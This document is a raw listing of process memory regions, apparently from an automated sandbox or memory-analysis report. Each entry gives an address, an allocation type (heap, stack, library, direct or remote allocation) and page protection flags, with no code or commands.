page read and write
9470000
trusted library allocation
page read and write
6829000
heap
page read and write
54F6000
heap
page read and write
7A80000
trusted library allocation
page read and write
556B000
heap
page read and write
9AF0000
heap
page read and write
27193000
trusted library allocation
page read and write
6EC5D000
unkown
page read and write
271A0000
trusted library allocation
page read and write
4161000
remote allocation
page execute and read and write
67E8000
heap
page read and write
27190000
trusted library allocation
page read and write
8BC2000
heap
page read and write
24B25000
trusted library allocation
page read and write
5ADD000
stack
page read and write
550F000
heap
page read and write
302A000
heap
page read and write
5598000
heap
page read and write
2F8F000
heap
page read and write
24AD0000
trusted library allocation
page read and write
1BF41730000
trusted library allocation
page read and write
B70000
heap
page read and write
907000
trusted library allocation
page execute and read and write
4F28000
trusted library allocation
page read and write
8BFB000
heap
page read and write
8690000
direct allocation
page read and write
8B55000
heap
page read and write
7350000
heap
page execute and read and write
8B4A000
heap
page read and write
682E000
heap
page read and write
553E000
heap
page read and write
7EC0000
trusted library allocation
page read and write
8B28000
heap
page read and write
8C8F000
heap
page read and write
461C000
stack
page read and write
1BF45E60000
heap
page read and write
2C3B000
heap
page read and write
551E000
heap
page read and write
92DE000
stack
page read and write
3150000
heap
page read and write
907F000
stack
page read and write
8C12000
heap
page read and write
8BB6000
heap
page read and write
24BD0000
trusted library allocation
page read and write
25AF1000
trusted library allocation
page read and write
682D000
heap
page read and write
26C63000
heap
page read and write
45DE000
stack
page read and write
9071000
direct allocation
page execute and read and write
8C85000
heap
page read and write
271A0000
trusted library allocation
page read and write
82AE000
stack
page read and write
27760000
trusted library allocation
page read and write
2FE4000
heap
page read and write
6A2E000
stack
page read and write
93C2000
heap
page read and write
32CE000
stack
page read and write
7E65000
trusted library allocation
page read and write
4FCA000
trusted library allocation
page read and write
8BFB000
heap
page read and write
80D0000
heap
page read and write
8305000
trusted library allocation
page read and write
93FA000
heap
page read and write
8C7D000
heap
page read and write
822E000
stack
page read and write
5528000
heap
page read and write
1BF45C99000
trusted library allocation
page read and write
550F000
heap
page read and write
2A40000
heap
page read and write
27190000
trusted library allocation
page read and write
73DF000
stack
page read and write
4F79000
trusted library allocation
page read and write
8BA4000
heap
page read and write
82EC000
stack
page read and write
8BAC000
heap
page read and write
1BF45D90000
trusted library allocation
page read and write
8C60000
heap
page read and write
178000
stack
page read and write
6B4E000
stack
page read and write
46C1000
trusted library allocation
page read and write
7010000
trusted library allocation
page read and write
8C7F000
heap
page read and write
27180000
trusted library allocation
page read and write
80FC000
heap
page read and write
6EC40000
unkown
page readonly
BEE000
stack
page read and write
C271000
direct allocation
page execute and read and write
328F000
unkown
page read and write
248C0000
heap
page read and write
CFB000
heap
page read and write
27190000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
26AFE000
trusted library allocation
page read and write
54FD000
heap
page read and write
920000
heap
page read and write
2F98000
heap
page read and write
30A0000
heap
page read and write
6E20000
trusted library allocation
page execute and read and write
2FB0000
heap
page read and write
1BF45E1F000
heap
page read and write
85F0000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
3047000
heap
page read and write
7BD4000
heap
page read and write
7F90000
trusted library allocation
page execute and read and write
68AE000
heap
page read and write
682D000
heap
page read and write
1BF40680000
heap
page read and write
3028000
heap
page read and write
4FA1000
trusted library allocation
page read and write
54F6000
heap
page read and write
27170000
trusted library allocation
page read and write
27170000
trusted library allocation
page read and write
1BF45C70000
trusted library allocation
page read and write
1BF45DA0000
trusted library allocation
page read and write
2498E000
stack
page read and write
8C5D000
heap
page read and write
B32000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
27790000
trusted library allocation
page read and write
271A0000
trusted library allocation
page read and write
5553000
heap
page read and write
5536000
heap
page read and write
27760000
trusted library allocation
page read and write
4A14000
trusted library allocation
page read and write
633000
heap
page read and write
93FC000
heap
page read and write
553E000
heap
page read and write
5596000
heap
page read and write
8B23000
heap
page read and write
25B19000
trusted library allocation
page read and write
8C12000
heap
page read and write
67D2000
heap
page read and write
1BF45DE0000
remote allocation
page read and write
BF0000
heap
page readonly
558C000
heap
page read and write
1BF41201000
trusted library allocation
page read and write
27790000
trusted library allocation
page read and write
6AEE000
stack
page read and write
8A31000
heap
page read and write
26C82000
heap
page read and write
688B000
heap
page read and write
BDDC97E000
unkown
page readonly
6886000
heap
page read and write
8AAE000
heap
page read and write
68AE000
heap
page read and write
550F000
heap
page read and write
B60000
trusted library allocation
page read and write
4060000
remote allocation
page execute and read and write
27170000
trusted library allocation
page read and write
2F9C000
heap
page read and write
30E0000
heap
page read and write
7177000
trusted library allocation
page read and write
4F00000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
555B000
heap
page read and write
8F70000
direct allocation
page execute and read and write
27167000
trusted library allocation
page read and write
3550000
heap
page read and write
BDDB97E000
unkown
page readonly
3037000
heap
page read and write
91DE000
stack
page read and write
271A0000
trusted library allocation
page execute and read and write
68F8000
trusted library allocation
page read and write
56B1000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
624000
heap
page read and write
1BF40813000
heap
page read and write
747B000
stack
page read and write
2F6E000
heap
page read and write
271A0000
trusted library allocation
page read and write
26BC0000
heap
page read and write
BDDD17E000
unkown
page readonly
80A0000
trusted library allocation
page read and write
7B40000
heap
page read and write
6C4B000
stack
page read and write
6873000
heap
page read and write
277B0000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
43D1000
trusted library allocation
page read and write
27770000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
5593000
heap
page read and write
5437000
trusted library allocation
page read and write
8B55000
heap
page read and write
8BAC000
heap
page read and write
1BF45C40000
trusted library allocation
page read and write
67F9000
heap
page read and write
54A4000
heap
page read and write
26BE0000
trusted library allocation
page read and write
5528000
heap
page read and write
72D2000
heap
page read and write
553E000
heap
page read and write
1BF41102000
heap
page read and write
271A0000
trusted library allocation
page read and write
33E0000
heap
page read and write
7A70000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
1BF41850000
trusted library section
page readonly
26B22000
trusted library allocation
page read and write
8B4E000
heap
page read and write
5523000
heap
page read and write
1BF45E3F000
heap
page read and write
8C7F000
heap
page read and write
826E000
stack
page read and write
553E000
heap
page read and write
8C85000
heap
page read and write
5538000
heap
page read and write
750D000
stack
page read and write
271A0000
trusted library allocation
page read and write
8C9A000
heap
page read and write
8C49000
heap
page read and write
9140000
direct allocation
page read and write
2472E000
stack
page read and write
302D000
heap
page read and write
271A0000
trusted library allocation
page read and write
6E10000
trusted library allocation
page read and write
3350000
heap
page read and write
4DE5000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
8C7A000
heap
page read and write
27760000
trusted library allocation
page read and write
1BF4111A000
heap
page read and write
7530000
trusted library allocation
page read and write
6D4A000
stack
page read and write
67FA000
heap
page read and write
26FD000
stack
page read and write
8C29000
heap
page read and write
52A0000
heap
page read and write
6821000
heap
page read and write
27160000
trusted library allocation
page read and write
B03000
trusted library allocation
page execute and read and write
5532000
heap
page read and write
46FE000
trusted library allocation
page read and write
2711E000
stack
page read and write
C00000
trusted library allocation
page read and write
3026000
heap
page read and write
2476E000
stack
page read and write
26CE5000
heap
page read and write
6FCF000
stack
page read and write
26C82000
heap
page read and write
68A6000
heap
page read and write
701E000
stack
page read and write
2FAA000
heap
page read and write
2FBE000
heap
page read and write
6AAE000
stack
page read and write
705E000
stack
page read and write
8C85000
heap
page read and write
CC2000
trusted library allocation
page read and write
553E000
heap
page read and write
C94000
trusted library allocation
page read and write
8C20000
heap
page read and write
68AE000
heap
page read and write
8B4D000
heap
page read and write
8BAC000
heap
page read and write
26BE0000
trusted library allocation
page read and write
2F81000
heap
page read and write
688E000
stack
page read and write
B60000
trusted library section
page read and write
277A0000
trusted library allocation
page read and write
3420000
heap
page read and write
9474000
heap
page read and write
6808000
heap
page read and write
6DDA000
heap
page read and write
8BFB000
heap
page read and write
5573000
heap
page read and write
1BF47000000
heap
page read and write
8700000
direct allocation
page read and write
1BF40760000
heap
page read and write
48FE000
trusted library allocation
page read and write
1BF45BB0000
trusted library allocation
page read and write
8BB6000
heap
page read and write
BDDC7FE000
stack
page read and write
7050000
trusted library allocation
page read and write
8761000
remote allocation
page execute and read and write
8B3C000
heap
page read and write
C70000
trusted library section
page read and write
BDDCDFE000
stack
page read and write
8B23000
heap
page read and write
67FA000
heap
page read and write
6DCB000
stack
page read and write
6DD3000
heap
page read and write
7570000
trusted library allocation
page read and write
CF0000
heap
page read and write
BDDCD7E000
stack
page read and write
2FB0000
heap
page read and write
24BB6000
trusted library allocation
page read and write
8C12000
heap
page read and write
1BF40790000
trusted library allocation
page read and write
C5A000
heap
page read and write
1BF45F0A000
heap
page read and write
8BBA000
heap
page read and write
8130000
heap
page read and write
8C41000
heap
page read and write
67FC000
heap
page read and write
935C000
stack
page read and write
7AF0000
heap
page read and write
71B0000
trusted library allocation
page read and write
8360000
trusted library allocation
page execute and read and write
C90000
trusted library allocation
page read and write
6EC41000
unkown
page execute read
1BF45E00000
heap
page read and write
BDDCC7E000
unkown
page readonly
5BDE000
stack
page read and write
54B1000
heap
page read and write
637000
heap
page read and write
26CBB000
heap
page read and write
6836000
heap
page read and write
981C000
stack
page read and write
F38000
trusted library allocation
page read and write
902000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
1BF40800000
heap
page read and write
4630000
heap
page read and write
247B0000
remote allocation
page read and write
26BB0000
heap
page execute and read and write
248B0000
trusted library allocation
page read and write
6FB0000
trusted library allocation
page read and write
6EC56000
unkown
page readonly
7232000
heap
page read and write
67FF000
heap
page read and write
8DD000
trusted library allocation
page execute and read and write
5094000
trusted library allocation
page read and write
687E000
heap
page read and write
4FB4000
heap
page read and write
24AAE000
stack
page read and write
2F95000
heap
page read and write
5584000
heap
page read and write
67E8000
heap
page read and write
335B000
heap
page read and write
F00000
heap
page readonly
6B35000
heap
page execute and read and write
34C6000
heap
page read and write
6910000
heap
page read and write
8070000
heap
page read and write
247EE000
stack
page read and write
271A0000
trusted library allocation
page read and write
6819000
heap
page read and write
27760000
trusted library allocation
page read and write
6807000
heap
page read and write
6826000
heap
page read and write
6EC5D000
unkown
page read and write
9380000
heap
page read and write
27170000
trusted library allocation
page read and write
2F98000
heap
page read and write
1BF41840000
trusted library section
page readonly
5542000
heap
page read and write
553E000
heap
page read and write
67ED000
heap
page read and write
1BF408B6000
heap
page read and write
910000
heap
page read and write
5514000
heap
page read and write
26CE2000
heap
page read and write
1BF45C84000
trusted library allocation
page read and write
7BE7000
heap
page read and write
271A0000
trusted library allocation
page read and write
944B000
heap
page read and write
9110000
direct allocation
page read and write
D671000
direct allocation
page execute and read and write
730000
heap
page read and write
27180000
trusted library allocation
page read and write
810E000
heap
page read and write
1BF45F04000
heap
page read and write
67F1000
heap
page read and write
8B52000
heap
page read and write
6893000
heap
page read and write
8BFB000
heap
page read and write
5528000
heap
page read and write
54F6000
heap
page read and write
53F9000
trusted library allocation
page read and write
8B66000
heap
page read and write
90A0000
direct allocation
page read and write
5557000
heap
page read and write
93E5000
heap
page read and write
8A97000
heap
page read and write
6EC56000
unkown
page readonly
8B57000
heap
page read and write
67F5000
heap
page read and write
8AAE000
heap
page read and write
1BF45E85000
heap
page read and write
552F000
heap
page read and write
8C12000
heap
page read and write
2FAE000
heap
page read and write
8BB6000
heap
page read and write
8C12000
heap
page read and write
271A0000
trusted library allocation
page read and write
9480000
heap
page read and write
BDDD97E000
unkown
page readonly
8BBA000
heap
page read and write
BDDC87E000
unkown
page readonly
7EAE000
stack
page read and write
6FF0000
trusted library allocation
page read and write
8080000
trusted library allocation
page execute and read and write
7DEE000
stack
page read and write
680D000
stack
page read and write
4FB6000
heap
page read and write
246AE000
stack
page read and write
BDDD07E000
stack
page read and write
9433000
heap
page read and write
72F0000
trusted library allocation
page read and write
5542000
heap
page read and write
682A000
heap
page read and write
8BB6000
heap
page read and write
BDDC37B000
stack
page read and write
6863000
heap
page read and write
4EAF000
trusted library allocation
page read and write
6807000
heap
page read and write
67FA000
heap
page read and write
6F2F000
stack
page read and write
BDDBD7C000
stack
page read and write
9388000
heap
page read and write
551A000
heap
page read and write
54F6000
heap
page read and write
277B0000
trusted library allocation
page read and write
1BF45E4C000
heap
page read and write
4719000
trusted library allocation
page read and write
6852000
heap
page read and write
8BCA000
heap
page read and write
9440000
heap
page read and write
8C58000
heap
page read and write
BDDBF7B000
stack
page read and write
7BEE000
heap
page read and write
2E8D000
stack
page read and write
4432000
trusted library allocation
page read and write
7FC0000
trusted library allocation
page read and write
B7C000
heap
page read and write
4702000
trusted library allocation
page read and write
816E000
stack
page read and write
26AFB000
trusted library allocation
page read and write
24BC8000
trusted library allocation
page read and write
67D2000
heap
page read and write
27190000
trusted library allocation
page read and write
1BF45F0A000
heap
page read and write
3037000
heap
page read and write
27760000
trusted library allocation
page read and write
2FD6000
heap
page read and write
6D4E000
heap
page read and write
8BFB000
heap
page read and write
93F4000
heap
page read and write
24BF8000
trusted library allocation
page read and write
24BE6000
trusted library allocation
page read and write
270DE000
stack
page read and write
27770000
trusted library allocation
page read and write
6807000
heap
page read and write
8C40000
heap
page read and write
AEE000
stack
page read and write
657000
heap
page read and write
1BF41100000
heap
page read and write
AE71000
direct allocation
page execute and read and write
67ED000
heap
page read and write
271A0000
trusted library allocation
page read and write
2F81000
heap
page read and write
6A0000
heap
page read and write
D1E000
stack
page read and write
BDDC6FE000
stack
page read and write
2F9A000
heap
page read and write
599B000
stack
page read and write
3180000
heap
page read and write
27760000
trusted library allocation
page read and write
1BF40890000
heap
page read and write
5538000
heap
page read and write
271A0000
trusted library allocation
page read and write
26D00000
heap
page read and write
5857000
trusted library allocation
page read and write
1BF4082B000
heap
page read and write
6D50000
heap
page read and write
8BBA000
heap
page read and write
80EF000
stack
page read and write
247B0000
remote allocation
page read and write
27170000
trusted library allocation
page read and write
5539000
heap
page read and write
8A99000
heap
page read and write
4E5E000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
8C12000
heap
page read and write
8650000
direct allocation
page read and write
6827000
heap
page read and write
558D000
heap
page read and write
6B8E000
stack
page read and write
2709D000
stack
page read and write
7FA0000
trusted library allocation
page read and write
24A6C000
stack
page read and write
8D0000
trusted library allocation
page read and write
8BC2000
heap
page read and write
6807000
heap
page read and write
8C4D000
heap
page read and write
27190000
trusted library allocation
page read and write
681E000
heap
page read and write
6FAD000
stack
page read and write
8B48000
heap
page read and write
310E000
unkown
page read and write
7F77000
stack
page read and write
5538000
heap
page read and write
50E9000
trusted library allocation
page read and write
7F400000
trusted library allocation
page execute and read and write
65B0000
trusted library allocation
page read and write
9100000
direct allocation
page read and write
3031000
heap
page read and write
BDDBB7E000
stack
page read and write
1BF45D90000
trusted library allocation
page read and write
7F360000
trusted library allocation
page execute and read and write
7170000
trusted library allocation
page read and write
2FF0000
heap
page read and write
6883000
heap
page read and write
27760000
trusted library allocation
page read and write
8B4E000
heap
page read and write
C20000
heap
page execute and read and write
7520000
trusted library allocation
page read and write
8C88000
heap
page read and write
2A70000
heap
page read and write
26CDD000
heap
page read and write
8BC2000
heap
page read and write
67FA000
heap
page read and write
1BF4088D000
heap
page read and write
1BF41540000
trusted library allocation
page read and write
2FBE000
heap
page read and write
26CB0000
heap
page read and write
5541000
heap
page read and write
5576000
heap
page read and write
27760000
trusted library allocation
page read and write
2715E000
stack
page read and write
B04000
trusted library allocation
page read and write
2FBE000
heap
page read and write
43E000
stack
page read and write
8C88000
heap
page read and write
5553000
heap
page read and write
67ED000
heap
page read and write
54FC000
heap
page read and write
551F000
heap
page read and write
8C85000
heap
page read and write
6C12000
heap
page read and write
27760000
trusted library allocation
page read and write
6805000
heap
page read and write
26B02000
trusted library allocation
page read and write
93FA000
heap
page read and write
8C4C000
heap
page read and write
27170000
trusted library allocation
page read and write
E1E000
stack
page read and write
551F000
heap
page read and write
B00000
trusted library allocation
page read and write
2EF7000
stack
page read and write
6812000
heap
page read and write
302C000
heap
page read and write
A00000
heap
page read and write
687B000
heap
page read and write
33CE000
stack
page read and write
B19000
trusted library allocation
page read and write
6EC41000
unkown
page execute read
26C43000
heap
page read and write
BDDB877000
stack
page read and write
2F8C000
heap
page read and write
271A0000
trusted library allocation
page read and write
81EC000
stack
page read and write
F2D000
stack
page read and write
26C00000
heap
page read and write
4B61000
remote allocation
page execute and read and write
1BF408B2000
heap
page read and write
93FA000
heap
page read and write
80E0000
heap
page read and write
9433000
heap
page read and write
8090000
trusted library allocation
page read and write
67FF000
heap
page read and write
5541000
heap
page read and write
5523000
heap
page read and write
71F0000
heap
page read and write
5562000
trusted library allocation
page read and write
47E000
stack
page read and write
9AF1000
heap
page read and write
67F1000
heap
page read and write
BDDD8FE000
stack
page read and write
46A8000
heap
page read and write
1BF45EFF000
heap
page read and write
8B21000
heap
page read and write
67E8000
heap
page read and write
7F7D1000
trusted library allocation
page execute read
24BB0000
trusted library allocation
page read and write
BDDBC7E000
unkown
page readonly
8AB0000
heap
page read and write
6EEE000
stack
page read and write
CC5000
trusted library allocation
page execute and read and write
67EE000
heap
page read and write
550F000
heap
page read and write
6E50000
trusted library allocation
page read and write
8C85000
heap
page read and write
26C26000
heap
page read and write
5524000
heap
page read and write
8710000
direct allocation
page read and write
1BF41860000
trusted library section
page readonly
682D000
heap
page read and write
72B8000
heap
page read and write
6D44000
heap
page read and write
7B50000
trusted library allocation
page execute and read and write
5536000
heap
page read and write
8BAC000
heap
page read and write
CA9000
trusted library allocation
page read and write
7330000
trusted library allocation
page execute and read and write
7E2E000
stack
page read and write
1BF45C80000
trusted library allocation
page read and write
C6A000
heap
page read and write
46AC000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
2BD0000
heap
page read and write
6A6E000
stack
page read and write
27FE000
stack
page read and write
812E000
stack
page read and write
8BC2000
heap
page read and write
834E000
stack
page read and write
4A58000
trusted library allocation
page read and write
248A0000
trusted library allocation
page execute and read and write
27190000
trusted library allocation
page read and write
6831000
heap
page read and write
2F99000
heap
page read and write
8BBA000
heap
page read and write
5571000
heap
page read and write
471C000
trusted library allocation
page read and write
2F81000
heap
page read and write
5554000
heap
page read and write
AF0000
trusted library allocation
page read and write
1BF4083F000
heap
page read and write
67F8000
heap
page read and write
67D2000
heap
page read and write
27190000
trusted library allocation
page read and write
C93000
trusted library allocation
page execute and read and write
1BF4085B000
heap
page read and write
8640000
direct allocation
page read and write
8C94000
heap
page read and write
67B0000
heap
page read and write
550F000
heap
page read and write
682B000
heap
page read and write
971C000
stack
page read and write
5568000
heap
page read and write
6EC5F000
unkown
page readonly
8C75000
heap
page read and write
5580000
heap
page read and write
1BF45F02000
heap
page read and write
34C0000
heap
page read and write
6D58000
heap
page read and write
552E000
heap
page read and write
8C0000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
556E000
heap
page read and write
1BF45C20000
trusted library allocation
page read and write
8B55000
heap
page read and write
271A0000
trusted library allocation
page read and write
86C0000
direct allocation
page read and write
4A67000
trusted library allocation
page read and write
8BB6000
heap
page read and write
27170000
trusted library allocation
page read and write
BDDC5FE000
stack
page read and write
9090000
direct allocation
page read and write
CBA000
trusted library allocation
page execute and read and write
1BF41830000
trusted library section
page readonly
1BF45D80000
trusted library allocation
page read and write
8E4F000
heap
page read and write
26BC0000
trusted library allocation
page read and write
27770000
trusted library allocation
page read and write
5536000
heap
page read and write
854E000
stack
page read and write
26AF4000
trusted library allocation
page read and write
682D000
heap
page read and write
93F2000
heap
page read and write
680D000
heap
page read and write
8C7E000
heap
page read and write
75EB000
stack
page read and write
4689000
trusted library allocation
page read and write
551F000
heap
page read and write
8C7A000
heap
page read and write
68CB000
stack
page read and write
7B3E000
stack
page read and write
6EC40000
unkown
page readonly
8C18000
heap
page read and write
27780000
trusted library allocation
page read and write
5517000
heap
page read and write
6F6E000
stack
page read and write
CC0000
trusted library allocation
page read and write
6DA6000
heap
page read and write
1BF45ED8000
heap
page read and write
30A3000
heap
page read and write
6DBB000
heap
page read and write
719A000
trusted library allocation
page read and write
5550000
heap
page read and write
469C000
trusted library allocation
page read and write
271A0000
trusted library allocation
page read and write
46A0000
heap
page read and write
8B21000
heap
page read and write
1BF45EF5000
heap
page read and write
931D000
stack
page read and write
6B30000
heap
page execute and read and write
271A0000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
9250000
heap
page read and write
3026000
heap
page read and write
1BF40FE1000
trusted library allocation
page read and write
6B2E000
stack
page read and write
943A000
heap
page read and write
552E000
heap
page read and write
7040000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
681A000
heap
page read and write
5557000
heap
page read and write
5553000
heap
page read and write
BDDC27E000
unkown
page readonly
8BB6000
heap
page read and write
6E90000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
6B7F000
stack
page read and write
555C000
heap
page read and write
E5D000
stack
page read and write
68AE000
heap
page read and write
8F2000
trusted library allocation
page read and write
8BBA000
heap
page read and write
2F98000
heap
page read and write
54E2000
heap
page read and write
5579000
heap
page read and write
6E80000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
5584000
heap
page read and write
552E000
heap
page read and write
27790000
trusted library allocation
page read and write
555E000
heap
page read and write
806E000
stack
page read and write
929E000
stack
page read and write
2FA0000
heap
page read and write
86D0000
direct allocation
page read and write
2F3E000
stack
page read and write
27190000
trusted library allocation
page read and write
68AB000
heap
page read and write
8B2D000
heap
page read and write
6DE0000
heap
page read and write
BDDCBFE000
stack
page read and write
65B4000
trusted library allocation
page read and write
F20000
heap
page execute and read and write
72B6000
heap
page read and write
1BF40660000
heap
page read and write
481E000
trusted library allocation
page read and write
68AE000
heap
page read and write
90C0000
direct allocation
page read and write
68F0000
trusted library allocation
page read and write
8BC2000
heap
page read and write
2B7A000
stack
page read and write
8C98000
heap
page read and write
BB6000
heap
page read and write
24AB0000
trusted library allocation
page read and write
1BF45C30000
trusted library allocation
page read and write
72A0000
heap
page read and write
2FBE000
heap
page read and write
739E000
stack
page read and write
8BC2000
heap
page read and write
271A0000
trusted library allocation
page read and write
DDE000
stack
page read and write
277A0000
trusted library allocation
page read and write
8C6D000
heap
page read and write
93F5000
heap
page read and write
710000
heap
page read and write
7580000
trusted library allocation
page read and write
6846000
heap
page read and write
27770000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
3090000
heap
page read and write
7EB0000
trusted library allocation
page execute and read and write
600000
heap
page read and write
8B55000
heap
page read and write
8C9A000
heap
page read and write
7FB0000
heap
page read and write
8BB6000
heap
page read and write
5043000
trusted library allocation
page read and write
1BF45C70000
trusted library allocation
page read and write
7F80000
heap
page read and write
26CB1000
heap
page read and write
6826000
heap
page read and write
F10000
trusted library allocation
page execute and read and write
27180000
trusted library allocation
page execute and read and write
1BF41810000
trusted library section
page readonly
452C000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
27170000
trusted library allocation
page read and write
6808000
heap
page read and write
8B2C000
heap
page read and write
46B1000
trusted library allocation
page read and write
54A0000
heap
page read and write
27190000
trusted library allocation
page read and write
27191000
trusted library allocation
page read and write
6841000
heap
page read and write
5561000
remote allocation
page execute and read and write
5553000
heap
page read and write
81AC000
stack
page read and write
90B000
trusted library allocation
page execute and read and write
BDDCF7E000
unkown
page readonly
67ED000
heap
page read and write
A20000
heap
page read and write
82F0000
trusted library allocation
page read and write
7A60000
trusted library allocation
page execute and read and write
6896000
heap
page read and write
7361000
remote allocation
page execute and read and write
68AD000
heap
page read and write
6815000
heap
page read and write
9180000
heap
page read and write
74CE000
stack
page read and write
67CE000
stack
page read and write
8C7F000
heap
page read and write
72F8000
trusted library allocation
page read and write
56D9000
trusted library allocation
page read and write
2FA3000
heap
page read and write
8B55000
heap
page read and write
848C000
stack
page read and write
2717B000
trusted library allocation
page read and write
1BF41002000
heap
page read and write
303D000
heap
page read and write
2F2F000
stack
page read and write
24AF1000
trusted library allocation
page read and write
A471000
direct allocation
page execute and read and write
24840000
direct allocation
page read and write
9255000
heap
page read and write
467E000
stack
page read and write
8C80000
heap
page read and write
27760000
trusted library allocation
page read and write
8610000
trusted library allocation
page execute and read and write
27190000
trusted library allocation
page read and write
7082000
heap
page read and write
2494E000
stack
page read and write
26C55000
heap
page read and write
8D3000
trusted library allocation
page execute and read and write
96A0000
trusted library allocation
page read and write
D9F000
stack
page read and write
6FC0000
trusted library allocation
page read and write
6DD0000
heap
page read and write
8BBA000
heap
page read and write
13C000
stack
page read and write
7A50000
heap
page read and write
2F96000
heap
page read and write
944E000
heap
page read and write
4620000
trusted library allocation
page read and write
6650000
heap
page read and write
7BB0000
heap
page read and write
8C8D000
heap
page read and write
26B30000
trusted library allocation
page read and write
6822000
heap
page read and write
26BAC000
stack
page read and write
5513000
heap
page read and write
BDDC47E000
unkown
page readonly
7070000
trusted library allocation
page read and write
8C12000
heap
page read and write
1BF40892000
heap
page read and write
7550000
trusted library allocation
page read and write
1F0000
heap
page read and write
BDDCEFE000
unkown
page readonly
5536000
heap
page read and write
54EB000
heap
page read and write
B40000
heap
page read and write
6E60000
trusted library allocation
page read and write
8BBD000
heap
page read and write
689E000
heap
page read and write
6C0D000
stack
page read and write
6866000
heap
page read and write
8BFB000
heap
page read and write
943B000
heap
page read and write
5557000
heap
page read and write
6EC5F000
unkown
page readonly
5EE000
stack
page read and write
1BF40929000
heap
page read and write
50BC000
trusted library allocation
page read and write
67E8000
heap
page read and write
27190000
trusted library allocation
page read and write
8BC2000
heap
page read and write
5581000
heap
page read and write
8BAC000
heap
page read and write
581F000
stack
page read and write
1BF45C80000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
2F95000
heap
page read and write
67E8000
heap
page read and write
5538000
heap
page read and write
26B6C000
stack
page read and write
30A7000
heap
page read and write
CAD000
stack
page read and write
308E000
stack
page read and write
5530000
heap
page read and write
5553000
heap
page read and write
1BF41015000
heap
page read and write
6839000
heap
page read and write
5524000
heap
page read and write
67EC000
heap
page read and write
6849000
heap
page read and write
B0D000
trusted library allocation
page execute and read and write
C9D000
trusted library allocation
page execute and read and write
CA0000
trusted library allocation
page read and write
2482F000
stack
page read and write
8A99000
heap
page read and write
8660000
direct allocation
page read and write
5A9F000
stack
page read and write
6D0D000
stack
page read and write
5567000
heap
page read and write
53D1000
trusted library allocation
page read and write
1BF45E53000
heap
page read and write
271A0000
trusted library allocation
page read and write
5576000
heap
page read and write
1BF41820000
trusted library section
page readonly
30F5000
heap
page read and write
6826000
heap
page read and write
3047000
heap
page read and write
B35000
trusted library allocation
page execute and read and write
E9F000
stack
page read and write
1BF41000000
heap
page read and write
354F000
stack
page read and write
72CD000
heap
page read and write
BDDC4FE000
stack
page read and write
24850000
direct allocation
page read and write
685A000
heap
page read and write
67EA000
heap
page read and write
27780000
trusted library allocation
page read and write
1BF40902000
heap
page read and write
551E000
heap
page read and write
1BF45D20000
trusted library allocation
page read and write
9257000
heap
page read and write
3660000
heap
page read and write
30F0000
heap
page read and write
6FD0000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
24AE0000
heap
page execute and read and write
80E6000
heap
page read and write
67EE000
heap
page read and write
2FBE000
heap
page read and write
67F4000
heap
page read and write
8C60000
heap
page read and write
90E0000
direct allocation
page read and write
943E000
heap
page read and write
C24000
heap
page read and write
26B0E000
trusted library allocation
page read and write
A6E000
stack
page read and write
6E8000
heap
page read and write
5538000
heap
page read and write
1BF45EEA000
heap
page read and write
4681000
trusted library allocation
page read and write
CE0000
trusted library allocation
page read and write
2F30000
heap
page read and write
B2F000
stack
page read and write
8BB6000
heap
page read and write
6857000
heap
page read and write
6E70000
trusted library allocation
page read and write
8E0000
trusted library allocation
page read and write
686B000
heap
page read and write
26BC0000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
BDDC77E000
unkown
page readonly
678E000
stack
page read and write
8BC2000
heap
page read and write
7000000
trusted library allocation
page read and write
7B60000
trusted library allocation
page read and write
641000
heap
page read and write
5516000
heap
page read and write
C80000
trusted library allocation
page read and write
9070000
heap
page readonly
52C0000
heap
page read and write
5F61000
remote allocation
page execute and read and write
683E000
heap
page read and write
277A0000
trusted library allocation
page read and write
674B000
stack
page read and write
277A0000
trusted library allocation
page read and write
556B000
heap
page read and write
8B2A000
heap
page read and write
1BF45EFD000
heap
page read and write
C6C000
stack
page read and write
2FD1000
heap
page read and write
8BBA000
heap
page read and write
2F8E000
stack
page read and write
277A0000
trusted library allocation
page read and write
551A000
heap
page read and write
9120000
direct allocation
page read and write
850E000
stack
page read and write
27190000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
2E2F000
unkown
page read and write
980000
heap
page read and write
27190000
trusted library allocation
page read and write
BDDCA7E000
stack
page read and write
551F000
heap
page read and write
6D98000
heap
page read and write
85CC000
stack
page read and write
682A000
heap
page read and write
8AAE000
heap
page read and write
8B55000
heap
page read and write
8BFB000
heap
page read and write
8C68000
heap
page read and write
BDDC07E000
unkown
page readonly
8630000
trusted library allocation
page read and write
277A0000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
271A0000
trusted library allocation
page read and write
90B0000
direct allocation
page read and write
5C60000
trusted library allocation
page read and write
27760000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
560000
heap
page read and write
33D0000
trusted library allocation
page read and write
1BF45D10000
trusted library allocation
page read and write
BDDCB7E000
unkown
page readonly
8B33000
heap
page read and write
90F0000
direct allocation
page read and write
8AAE000
heap
page read and write
BAE000
stack
page read and write
2BE0000
heap
page read and write
68AE000
heap
page read and write
26BF0000
heap
page read and write
5541000
heap
page read and write
6EC5F000
unkown
page readonly
73B000
heap
page read and write
8C78000
heap
page read and write
27170000
trusted library allocation
page read and write
B40000
heap
page read and write
24998000
trusted library allocation
page read and write
8F7E000
stack
page read and write
2489A000
stack
page read and write
6DB6000
heap
